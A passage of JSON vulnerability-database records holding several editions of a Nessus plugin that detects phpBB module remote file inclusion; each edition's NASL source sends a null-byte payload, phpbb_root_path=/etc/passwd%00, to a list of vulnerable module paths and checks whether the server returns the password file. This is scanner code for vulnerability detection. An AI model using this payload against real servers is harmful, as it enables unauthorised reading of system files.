"NONE"}}, "hash": "6128dc18f146eb2143c7331c8f8dee39de611afadcd80cec7f7a20608d971c33", "hashmap": [{"hash": "cd1acb6332b705efcfb274e39bdce0d5", "key": "title"}, {"hash": "4d9c49a2a6a3144a40f9c20b01976545", "key": "references"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "eb7c1eabb2baa803f2635d2ba4792d3f", "key": "pluginID"}, {"hash": "015cb78ce50d3bd4e2fbe18f25603329", "key": "modified"}, {"hash": "69db04a1c80dd4a176e4f3d53561e805", "key": "cvelist"}, {"hash": "b8ec7988b9627a83f1d82122e582413e", "key": "description"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "8b5dc20b319b47100bd63d45b155e50c", "key": "published"}, {"hash": "07948b8ff59e8dda0b01012f70f00327", "key": "naslFamily"}, {"hash": "f850038f28a9086139708577a2889260", "key": "sourceData"}, {"hash": "737e2591b537c46d1ca7ce6f0cea5cb9", "key": "cvss"}, {"hash": "65920404be9df979f281f296ff035289", "key": "cpe"}, {"hash": "9acce4448de96d820472fbc896512e35", "key": "href"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=21323", "id": "PHPBB_AUCTION_PHPBB_ROOT_PATH_FILE_INCLUDE.NASL", "lastseen": "2018-11-17T03:07:38", "modified": "2018-11-15T00:00:00", "naslFamily": "CGI abuses", "objectVersion": "1.3", "pluginID": "21323", "published": "2006-05-04T00:00:00", "references": ["https://www.phpbb.com/community/viewtopic.php?p=2504370&highlight=#2504370", "https://seclists.org/bugtraq/2006/Oct/209", "http://www.nessus.org/u?9640ab6a", "https://www.securityfocus.com/archive/1/452012/30/0/threaded", "https://www.securityfocus.com/archive/1/479997/30/0/threaded", "http://www.nessus.org/u?37fd2995"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(21323);\n script_version(\"1.40\");\n\n script_cve_id(\n \"CVE-2006-2245\",\n \"CVE-2006-5301\",\n \"CVE-2006-5306\",\n \"CVE-2006-5390\",\n \"CVE-2006-5418\",\n \"CVE-2006-7090\",\n \"CVE-2006-7100\",\n \"CVE-2006-7147\",\n \"CVE-2007-5009\",\n \"CVE-2007-5100\"\n );\n script_bugtraq_id(\n 17822, \n 20484, \n 20485, \n 20493, \n 20501, \n 20518, \n 20525, \n 20558, \n 20571, \n 21171, \n 25737, \n 25776\n );\n script_xref(name:\"EDB-ID\", value:\"2483\");\n script_xref(name:\"EDB-ID\", value:\"2522\");\n script_xref(name:\"EDB-ID\", value:\"2525\");\n script_xref(name:\"EDB-ID\", value:\"2533\");\n script_xref(name:\"EDB-ID\", value:\"2538\");\n\n script_name(english:\"phpBB Multiple Module phpbb_root_path Parameter Remote File Inclusion\");\n script_summary(english:\"Tries to read a local file using phpBB modules\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains a PHP application that is prone to\nremote file include attacks.\" );\n script_set_attribute(attribute:\"description\", value:\n\"The remote host contains a third-party module for phpBB. \n\nThe version of at least one such component or module installed on the\nremote host fails to sanitize input to the 'phpbb_root_path' parameter\nbefore using it to include PHP code. Provided PHP's\n'register_globals' setting is enabled, an unauthenticated attacker may\nbe able to exploit these flaws to view arbitrary files on the remote\nhost or to execute arbitrary PHP code, possibly taken from third-party\nhosts.\" );\n # http://web.archive.org/web/20070527141033/http://pridels.blogspot.com/2006/05/phpbb-auction-mod-remote-file.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?9640ab6a\" );\n script_set_attribute(attribute:\"see_also\", value:\"https://seclists.org/bugtraq/2006/Oct/209\" );\n script_set_attribute(attribute:\"see_also\", value:\"https://www.phpbb.com/community/viewtopic.php?p=2504370&highlight=#2504370\" );\n script_set_attribute(attribute:\"see_also\", value:\"https://www.securityfocus.com/archive/1/452012/30/0/threaded\" );\n script_set_attribute(attribute:\"see_also\", value:\"https://www.securityfocus.com/archive/1/479997/30/0/threaded\" );\n # https://web.archive.org/web/20160820141912/http://www.phpbb2.de/ftopic45218.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?37fd2995\" );\n script_set_attribute(attribute:\"solution\", value:\n\"Disable PHP's 'register_globals' setting or contact the product's\nauthor to see if an upgrade exists.\" );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(94);\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2006/05/04\");\n script_set_attribute(attribute:\"vuln_publication_date\", value: \"2006/05/03\");\n script_cvs_date(\"Date: 2018/11/15 20:50:18\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\",value:\"cpe:/a:phpbb_group:phpbb-auction\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2006-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"phpbb_detect.nasl\");\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n script_require_ports(\"Services/www\", 80);\n script_require_keys(\"www/phpBB\");\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"data_protection.inc\");\n\nport = get_http_port(default:80);\nif (!can_host_php(port:port)) exit(0);\n\n\n# Vulnerable scripts.\n# - modules\nnmods = 0;\nmod = make_array();\n# - ACP User Registration\nmod[nmods++] = \"/includes/functions_mod_user.php\";\n# - Admin User Viewed Posts Tracker\nmod[nmods++] = \"/includes/functions_user_viewed_posts.php\";\n# - AI chat (included in PlusXL)\nmod[nmods++] = \"/mods/iai/includes/constants.php\";\n# - Import Tools - Members\nmod[nmods++] = \"/includes/functions_mod_user.php\";\n# - Insert User\nmod[nmods++] = \"/includes/functions_mod_user.php\";\n# - Journals System\nmod[nmods++] = \"/includes/journals_delete.php\";\nmod[nmods++] = \"/includes/journals_edit.php\";\nmod[nmods++] = \"/includes/journals_post.php\";\n# - phpBB auction\nmod[nmods++] = \"/auction/auction_common.php\";\n# - phpBB Search Engine Indexer\nmod[nmods++] = \"/includes/archive/archive_topic.php\";\n# - phpBB Security\nmod[nmods++] = \"/includes/phpbb_security.php\";\n# - phpBB2 Plus (not really a mod)\nmod[nmods++] = \"/language/lang_german/lang_main_album.php\";\nmod[nmods++] = \"/language/lang_german/lang_admin_album.php\";\nmod[nmods++] = \"/language/lang_english/lang_main_album.php\";\nmod[nmods++] = \"/language/lang_english/lang_admin_album.php\";\n# - PlusXL itself\nmod[nmods++] = \"/includes/functions.php\";\n# - SpamBlockerMod\nmod[nmods++] = \"/includes/antispam.php\";\n\n\ninfo = \"\";\ncontents = \"\";\n\n\n# Test an install.\ninstall = get_kb_item(string(\"www/\", port, \"/phpBB\"));\nif (isnull(install)) exit(0);\nmatches = eregmatch(string:install, pattern:\"^(.+) under (/.*)$\");\nif (!isnull(matches)) {\n dir = matches[2];\n\n # Try to exploit the flaw to read a file.\n file = \"/etc/passwd%00\";\n for (i=0; i<nmods; i++)\n {\n r = http_send_recv3(method:\"GET\", \n item:string(\n dir, mod[i], \"?\",\n \"phpbb_root_path=\", file\n ), \n port:port\n );\n if (isnull(r)) exit(0);\n res = r[2];\n\n # There's a problem if...\n if (\n # there's an entry for root or...\n egrep(pattern:\"root:.*:0:[01]:\", string:res) ||\n # we get an error saying \"failed to open stream\".\n egrep(pattern:\"main\$/etc/passwd\\\\0.+ failed to open stream\", string:res) ||\n # we get an error claiming the file doesn't exist or...\n egrep(pattern:\"main\\(/etc/passwd\$.*: failed to open stream: No such file or directory\", string:res) ||\n # we get an error about open_basedir restriction.\n egrep(pattern:\"main.+ open_basedir restriction in effect. File\\(/etc/passwd\", string:res)\n )\n {\n info = info +\n \" \" + dir + mod[i] + '\\n';\n\n if (!contents && egrep(string:res, pattern:\"root:.*:0:[01]:\"))\n contents = res - strstr(res, \"<br\");\n\n if (!thorough_tests) break;\n }\n }\n}\n\nif (info)\n{\n if (contents)\n {\n contents = data_protection::redact_etc_passwd(output:contents);\n info = string(\n info,\n \"\\n\",\n \"And here are the contents of the file '/etc/passwd' that Nessus\\n\",\n \"was able to read from the remote host :\\n\",\n \"\\n\",\n contents\n );\n }\n report = string(\n \"The following scripts(s) are vulnerable :\\n\",\n \"\\n\",\n info\n );\n\n security_warning(port:port, extra:report);\n}\n", "title": "phpBB Multiple Module phpbb_root_path Parameter Remote File Inclusion", "type": "nessus", "viewCount": 0}, "differentElements": ["description"], "edition": 9, "lastseen": "2018-11-17T03:07:38"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": [], "cvelist": ["CVE-2006-7090", "CVE-2006-5301", "CVE-2006-5418", "CVE-2006-7100", "CVE-2007-5009", "CVE-2006-5390", "CVE-2006-7147", "CVE-2006-2245", "CVE-2007-5100", "CVE-2006-5306"], "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "description": "The remote host contains a third-party module for phpBB. \n\nThe version of at least one such component or module installed on the remote host fails to sanitize input to the 'phpbb_root_path' parameter before using it to include PHP code. Provided PHP's 'register_globals' setting is enabled, an unauthenticated attacker may be able to exploit these flaws to view arbitrary files on the remote host or to execute arbitrary PHP code, possibly taken from third-party hosts.", "edition": 3, "enchantments": {}, "hash": "e9e3415408c507c545c811ac0c731f266b973e06158d3baf50bfa5f941a3b35e", "hashmap": [{"hash": "cd1acb6332b705efcfb274e39bdce0d5", "key": "title"}, {"hash": "fed7aede4a5f01a9fc080184a2dd8da8", "key": "references"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "eb7c1eabb2baa803f2635d2ba4792d3f", "key": "pluginID"}, {"hash": "69db04a1c80dd4a176e4f3d53561e805", "key": "cvelist"}, {"hash": "b8ec7988b9627a83f1d82122e582413e", "key": "description"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "8b5dc20b319b47100bd63d45b155e50c", "key": "published"}, {"hash": "64dc5d9d713f988fa1649531a8cbae65", "key": "sourceData"}, {"hash": "07948b8ff59e8dda0b01012f70f00327", "key": "naslFamily"}, {"hash": "737e2591b537c46d1ca7ce6f0cea5cb9", "key": "cvss"}, {"hash": "b672439e0dc96035c3e68e00611bd548", "key": "modified"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}, {"hash": "9acce4448de96d820472fbc896512e35", "key": "href"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=21323", "id": "PHPBB_AUCTION_PHPBB_ROOT_PATH_FILE_INCLUDE.NASL", "lastseen": "2017-04-26T00:46:11", "modified": "2017-04-25T00:00:00", "naslFamily": "CGI abuses", "objectVersion": "1.2", "pluginID": "21323", "published": "2006-05-04T00:00:00", "references": ["http://www.securityfocus.com/archive/1/479997/30/0/threaded", "http://www.nessus.org/u?9640ab6a", "http://www.phpbb.com/phpBB/viewtopic.php?p=2504370&highlight=#2504370", "http://www.nessus.org/u?37fd2995", "http://seclists.org/bugtraq/2006/Oct/209", "http://www.securityfocus.com/archive/1/452012/30/0/threaded"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(21323);\n script_version(\"$Revision: 1.37 $\");\n\n script_cve_id(\n \"CVE-2006-2245\",\n \"CVE-2006-5301\",\n \"CVE-2006-5306\",\n \"CVE-2006-5390\",\n \"CVE-2006-5418\",\n \"CVE-2006-7090\",\n \"CVE-2006-7100\",\n \"CVE-2006-7147\",\n \"CVE-2007-5009\",\n \"CVE-2007-5100\"\n );\n script_bugtraq_id(\n 17822, \n 20484, \n 20485, \n 20493, \n 20501, \n 20518, \n 20525, \n 20558, \n 20571, \n 21171, \n 25737, \n 25776\n );\n script_osvdb_id(\n 25263,\n 29711,\n 29712,\n 29713,\n 29714,\n 29734,\n 29751,\n 31029,\n 35449,\n 35450,\n 38265,\n 38723,\n 38724,\n 38725\n );\n script_xref(name:\"EDB-ID\", value:\"2483\");\n script_xref(name:\"EDB-ID\", value:\"2522\");\n script_xref(name:\"EDB-ID\", value:\"2525\");\n script_xref(name:\"EDB-ID\", value:\"2533\");\n script_xref(name:\"EDB-ID\", value:\"2538\");\n\n script_name(english:\"phpBB Multiple Module phpbb_root_path Parameter Remote File Inclusion\");\n script_summary(english:\"Tries to read a local file using phpBB modules\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains a PHP application that is prone to\nremote file include attacks.\" );\n script_set_attribute(attribute:\"description\", value:\n\"The remote host contains a third-party module for phpBB. \n\nThe version of at least one such component or module installed on the\nremote host fails to sanitize input to the 'phpbb_root_path' parameter\nbefore using it to include PHP code. Provided PHP's\n'register_globals' setting is enabled, an unauthenticated attacker may\nbe able to exploit these flaws to view arbitrary files on the remote\nhost or to execute arbitrary PHP code, possibly taken from third-party\nhosts.\" );\n # http://web.archive.org/web/20070527141033/http://pridels.blogspot.com/2006/05/phpbb-auction-mod-remote-file.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?9640ab6a\" );\n script_set_attribute(attribute:\"see_also\", value:\"http://seclists.org/bugtraq/2006/Oct/209\" );\n script_set_attribute(attribute:\"see_also\", value:\"http://www.phpbb.com/phpBB/viewtopic.php?p=2504370&highlight=#2504370\" );\n script_set_attribute(attribute:\"see_also\", value:\"http://www.securityfocus.com/archive/1/452012/30/0/threaded\" );\n script_set_attribute(attribute:\"see_also\", value:\"http://www.securityfocus.com/archive/1/479997/30/0/threaded\" );\n # https://web.archive.org/web/20160820141912/http://www.phpbb2.de/ftopic45218.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?37fd2995\" );\n script_set_attribute(attribute:\"solution\", value:\n\"Disable PHP's 'register_globals' setting or contact the product's\nauthor to see if an upgrade exists.\" );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(94);\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2006/05/04\");\n script_set_attribute(attribute:\"vuln_publication_date\", value: \"2006/05/03\");\n script_cvs_date(\"$Date: 2017/04/25 14:31:38 $\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\",value:\"cpe:/a:phpbb_group:phpbb-auction\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2006-2017 Tenable Network Security, Inc.\");\n\n script_dependencies(\"phpbb_detect.nasl\");\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n script_require_ports(\"Services/www\", 80);\n script_require_keys(\"www/phpBB\");\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\n\nport = get_http_port(default:80);\nif (!can_host_php(port:port)) exit(0);\n\n\n# Vulnerable scripts.\n# - modules\nnmods = 0;\nmod = make_array();\n# - ACP User Registration\nmod[nmods++] = \"/includes/functions_mod_user.php\";\n# - Admin User Viewed Posts Tracker\nmod[nmods++] = \"/includes/functions_user_viewed_posts.php\";\n# - AI chat (included in PlusXL)\nmod[nmods++] = \"/mods/iai/includes/constants.php\";\n# - Import Tools - Members\nmod[nmods++] = \"/includes/functions_mod_user.php\";\n# - Insert User\nmod[nmods++] = \"/includes/functions_mod_user.php\";\n# - Journals System\nmod[nmods++] = \"/includes/journals_delete.php\";\nmod[nmods++] = \"/includes/journals_edit.php\";\nmod[nmods++] = \"/includes/journals_post.php\";\n# - phpBB auction\nmod[nmods++] = \"/auction/auction_common.php\";\n# - phpBB Search Engine Indexer\nmod[nmods++] = \"/includes/archive/archive_topic.php\";\n# - phpBB Security\nmod[nmods++] = \"/includes/phpbb_security.php\";\n# - phpBB2 Plus (not really a mod)\nmod[nmods++] = \"/language/lang_german/lang_main_album.php\";\nmod[nmods++] = \"/language/lang_german/lang_admin_album.php\";\nmod[nmods++] = \"/language/lang_english/lang_main_album.php\";\nmod[nmods++] = \"/language/lang_english/lang_admin_album.php\";\n# - PlusXL itself\nmod[nmods++] = \"/includes/functions.php\";\n# - SpamBlockerMod\nmod[nmods++] = \"/includes/antispam.php\";\n\n\ninfo = \"\";\ncontents = \"\";\n\n\n# Test an install.\ninstall = get_kb_item(string(\"www/\", port, \"/phpBB\"));\nif (isnull(install)) exit(0);\nmatches = eregmatch(string:install, pattern:\"^(.+) under (/.*)$\");\nif (!isnull(matches)) {\n dir = matches[2];\n\n # Try to exploit the flaw to read a file.\n file = \"/etc/passwd%00\";\n for (i=0; i<nmods; i++)\n {\n r = http_send_recv3(method:\"GET\", \n item:string(\n dir, mod[i], \"?\",\n \"phpbb_root_path=\", file\n ), \n port:port\n );\n if (isnull(r)) exit(0);\n res = r[2];\n\n # There's a problem if...\n if (\n # there's an entry for root or...\n egrep(pattern:\"root:.*:0:[01]:\", string:res) ||\n # we get an error saying \"failed to open stream\".\n egrep(pattern:\"main\$/etc/passwd\\\\0.+ failed to open stream\", string:res) ||\n # we get an error claiming the file doesn't exist or...\n egrep(pattern:\"main\\(/etc/passwd\$.*: failed to open stream: No such file or directory\", string:res) ||\n # we get an error about open_basedir restriction.\n egrep(pattern:\"main.+ open_basedir restriction in effect. File\\(/etc/passwd\", string:res)\n )\n {\n info = info +\n \" \" + dir + mod[i] + '\\n';\n\n if (!contents && egrep(string:res, pattern:\"root:.*:0:[01]:\"))\n contents = res - strstr(res, \"<br\");\n\n if (!thorough_tests) break;\n }\n }\n}\n\nif (info)\n{\n if (contents)\n info = string(\n info,\n \"\\n\",\n \"And here are the contents of the file '/etc/passwd' that Nessus\\n\",\n \"was able to read from the remote host :\\n\",\n \"\\n\",\n contents\n );\n\n report = string(\n \"The following scripts(s) are vulnerable :\\n\",\n \"\\n\",\n info\n );\n\n security_warning(port:port, extra:report);\n}\n", "title": "phpBB Multiple Module phpbb_root_path Parameter Remote File Inclusion", "type": "nessus", "viewCount": 0}, "differentElements": ["cpe"], "edition": 3, "lastseen": "2017-04-26T00:46:11"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["cpe:/a:phpbb_group:phpbb-auction"], "cvelist": ["CVE-2006-7090", "CVE-2006-5301", "CVE-2006-5418", "CVE-2006-7100", "CVE-2007-5009", "CVE-2006-5390", "CVE-2006-7147", "CVE-2006-2245", "CVE-2007-5100", "CVE-2006-5306"], "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "description": "The remote host contains a third-party module for phpBB. \n\nThe version of at least one such component or module installed on the remote host fails to sanitize input to the 'phpbb_root_path' parameter before using it to include PHP code. Provided PHP's 'register_globals' setting is enabled, an unauthenticated attacker may be able to exploit these flaws to view arbitrary files on the remote host or to execute arbitrary PHP code, possibly taken from third-party hosts.", "edition": 4, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "hash": "4411c69ee4027049e7f05f5319215f3fd8655802d289f91beb469806b6ac9ea4", "hashmap": [{"hash": "cd1acb6332b705efcfb274e39bdce0d5", "key": "title"}, {"hash": "fed7aede4a5f01a9fc080184a2dd8da8", "key": "references"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "eb7c1eabb2baa803f2635d2ba4792d3f", "key": "pluginID"}, {"hash": "69db04a1c80dd4a176e4f3d53561e805", "key": "cvelist"}, {"hash": "b8ec7988b9627a83f1d82122e582413e", "key": "description"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "8b5dc20b319b47100bd63d45b155e50c", "key": "published"}, {"hash": "64dc5d9d713f988fa1649531a8cbae65", "key": "sourceData"}, {"hash": "07948b8ff59e8dda0b01012f70f00327", "key": "naslFamily"}, {"hash": "737e2591b537c46d1ca7ce6f0cea5cb9", "key": "cvss"}, {"hash": "b672439e0dc96035c3e68e00611bd548", "key": "modified"}, {"hash": "65920404be9df979f281f296ff035289", "key": "cpe"}, {"hash": "9acce4448de96d820472fbc896512e35", "key": "href"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=21323", "id": "PHPBB_AUCTION_PHPBB_ROOT_PATH_FILE_INCLUDE.NASL", "lastseen": "2017-10-29T13:41:28", "modified": "2017-04-25T00:00:00", "naslFamily": "CGI abuses", "objectVersion": "1.3", "pluginID": "21323", "published": "2006-05-04T00:00:00", "references": ["http://www.securityfocus.com/archive/1/479997/30/0/threaded", "http://www.nessus.org/u?9640ab6a", "http://www.phpbb.com/phpBB/viewtopic.php?p=2504370&highlight=#2504370", "http://www.nessus.org/u?37fd2995", "http://seclists.org/bugtraq/2006/Oct/209", "http://www.securityfocus.com/archive/1/452012/30/0/threaded"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(21323);\n script_version(\"$Revision: 1.37 $\");\n\n script_cve_id(\n \"CVE-2006-2245\",\n \"CVE-2006-5301\",\n \"CVE-2006-5306\",\n \"CVE-2006-5390\",\n \"CVE-2006-5418\",\n \"CVE-2006-7090\",\n \"CVE-2006-7100\",\n \"CVE-2006-7147\",\n \"CVE-2007-5009\",\n \"CVE-2007-5100\"\n );\n script_bugtraq_id(\n 17822, \n 20484, \n 20485, \n 20493, \n 20501, \n 20518, \n 20525, \n 20558, \n 20571, \n 21171, \n 25737, \n 25776\n );\n script_osvdb_id(\n 25263,\n 29711,\n 29712,\n 29713,\n 29714,\n 29734,\n 29751,\n 31029,\n 35449,\n 35450,\n 38265,\n 38723,\n 38724,\n 38725\n );\n script_xref(name:\"EDB-ID\", value:\"2483\");\n script_xref(name:\"EDB-ID\", value:\"2522\");\n script_xref(name:\"EDB-ID\", value:\"2525\");\n script_xref(name:\"EDB-ID\", value:\"2533\");\n script_xref(name:\"EDB-ID\", value:\"2538\");\n\n script_name(english:\"phpBB Multiple Module phpbb_root_path Parameter Remote File Inclusion\");\n script_summary(english:\"Tries to read a local file using phpBB modules\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains a PHP application that is prone to\nremote file include attacks.\" );\n script_set_attribute(attribute:\"description\", value:\n\"The remote host contains a third-party module for phpBB. \n\nThe version of at least one such component or module installed on the\nremote host fails to sanitize input to the 'phpbb_root_path' parameter\nbefore using it to include PHP code. Provided PHP's\n'register_globals' setting is enabled, an unauthenticated attacker may\nbe able to exploit these flaws to view arbitrary files on the remote\nhost or to execute arbitrary PHP code, possibly taken from third-party\nhosts.\" );\n # http://web.archive.org/web/20070527141033/http://pridels.blogspot.com/2006/05/phpbb-auction-mod-remote-file.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?9640ab6a\" );\n script_set_attribute(attribute:\"see_also\", value:\"http://seclists.org/bugtraq/2006/Oct/209\" );\n script_set_attribute(attribute:\"see_also\", value:\"http://www.phpbb.com/phpBB/viewtopic.php?p=2504370&highlight=#2504370\" );\n script_set_attribute(attribute:\"see_also\", value:\"http://www.securityfocus.com/archive/1/452012/30/0/threaded\" );\n script_set_attribute(attribute:\"see_also\", value:\"http://www.securityfocus.com/archive/1/479997/30/0/threaded\" );\n # https://web.archive.org/web/20160820141912/http://www.phpbb2.de/ftopic45218.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?37fd2995\" );\n script_set_attribute(attribute:\"solution\", value:\n\"Disable PHP's 'register_globals' setting or contact the product's\nauthor to see if an upgrade exists.\" );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(94);\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2006/05/04\");\n script_set_attribute(attribute:\"vuln_publication_date\", value: \"2006/05/03\");\n script_cvs_date(\"$Date: 2017/04/25 14:31:38 $\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\",value:\"cpe:/a:phpbb_group:phpbb-auction\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2006-2017 Tenable Network Security, Inc.\");\n\n script_dependencies(\"phpbb_detect.nasl\");\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n script_require_ports(\"Services/www\", 80);\n script_require_keys(\"www/phpBB\");\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\n\nport = get_http_port(default:80);\nif (!can_host_php(port:port)) exit(0);\n\n\n# Vulnerable scripts.\n# - modules\nnmods = 0;\nmod = make_array();\n# - ACP User Registration\nmod[nmods++] = \"/includes/functions_mod_user.php\";\n# - Admin User Viewed Posts Tracker\nmod[nmods++] = \"/includes/functions_user_viewed_posts.php\";\n# - AI chat (included in PlusXL)\nmod[nmods++] = \"/mods/iai/includes/constants.php\";\n# - Import Tools - Members\nmod[nmods++] = \"/includes/functions_mod_user.php\";\n# - Insert User\nmod[nmods++] = \"/includes/functions_mod_user.php\";\n# - Journals System\nmod[nmods++] = \"/includes/journals_delete.php\";\nmod[nmods++] = \"/includes/journals_edit.php\";\nmod[nmods++] = \"/includes/journals_post.php\";\n# - phpBB auction\nmod[nmods++] = \"/auction/auction_common.php\";\n# - phpBB Search Engine Indexer\nmod[nmods++] = \"/includes/archive/archive_topic.php\";\n# - phpBB Security\nmod[nmods++] = \"/includes/phpbb_security.php\";\n# - phpBB2 Plus (not really a mod)\nmod[nmods++] = \"/language/lang_german/lang_main_album.php\";\nmod[nmods++] = \"/language/lang_german/lang_admin_album.php\";\nmod[nmods++] = \"/language/lang_english/lang_main_album.php\";\nmod[nmods++] = \"/language/lang_english/lang_admin_album.php\";\n# - PlusXL itself\nmod[nmods++] = \"/includes/functions.php\";\n# - SpamBlockerMod\nmod[nmods++] = \"/includes/antispam.php\";\n\n\ninfo = \"\";\ncontents = \"\";\n\n\n# Test an install.\ninstall = get_kb_item(string(\"www/\", port, \"/phpBB\"));\nif (isnull(install)) exit(0);\nmatches = eregmatch(string:install, pattern:\"^(.+) under (/.*)$\");\nif (!isnull(matches)) {\n dir = matches[2];\n\n # Try to exploit the flaw to read a file.\n file = \"/etc/passwd%00\";\n for (i=0; i<nmods; i++)\n {\n r = http_send_recv3(method:\"GET\", \n item:string(\n dir, mod[i], \"?\",\n \"phpbb_root_path=\", file\n ), \n port:port\n );\n if (isnull(r)) exit(0);\n res = r[2];\n\n # There's a problem if...\n if (\n # there's an entry for root or...\n egrep(pattern:\"root:.*:0:[01]:\", string:res) ||\n # we get an error saying \"failed to open stream\".\n egrep(pattern:\"main\$/etc/passwd\\\\0.+ failed to open stream\", string:res) ||\n # we get an error claiming the file doesn't exist or...\n egrep(pattern:\"main\\(/etc/passwd\$.*: failed to open stream: No such file or directory\", string:res) ||\n # we get an error about open_basedir restriction.\n egrep(pattern:\"main.+ open_basedir restriction in effect. File\\(/etc/passwd\", string:res)\n )\n {\n info = info +\n \" \" + dir + mod[i] + '\\n';\n\n if (!contents && egrep(string:res, pattern:\"root:.*:0:[01]:\"))\n contents = res - strstr(res, \"<br\");\n\n if (!thorough_tests) break;\n }\n }\n}\n\nif (info)\n{\n if (contents)\n info = string(\n info,\n \"\\n\",\n \"And here are the contents of the file '/etc/passwd' that Nessus\\n\",\n \"was able to read from the remote host :\\n\",\n \"\\n\",\n contents\n );\n\n report = string(\n \"The following scripts(s) are vulnerable :\\n\",\n \"\\n\",\n info\n );\n\n security_warning(port:port, extra:report);\n}\n", "title": "phpBB Multiple Module phpbb_root_path Parameter Remote File Inclusion", "type": "nessus", "viewCount": 0}, "differentElements": ["modified", "sourceData"], "edition": 4, "lastseen": "2017-10-29T13:41:28"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["cpe:/a:phpbb_group:phpbb-auction"], "cvelist": ["CVE-2006-7090", "CVE-2006-5301", "CVE-2006-5418", "CVE-2006-7100", "CVE-2007-5009", "CVE-2006-5390", "CVE-2006-7147", 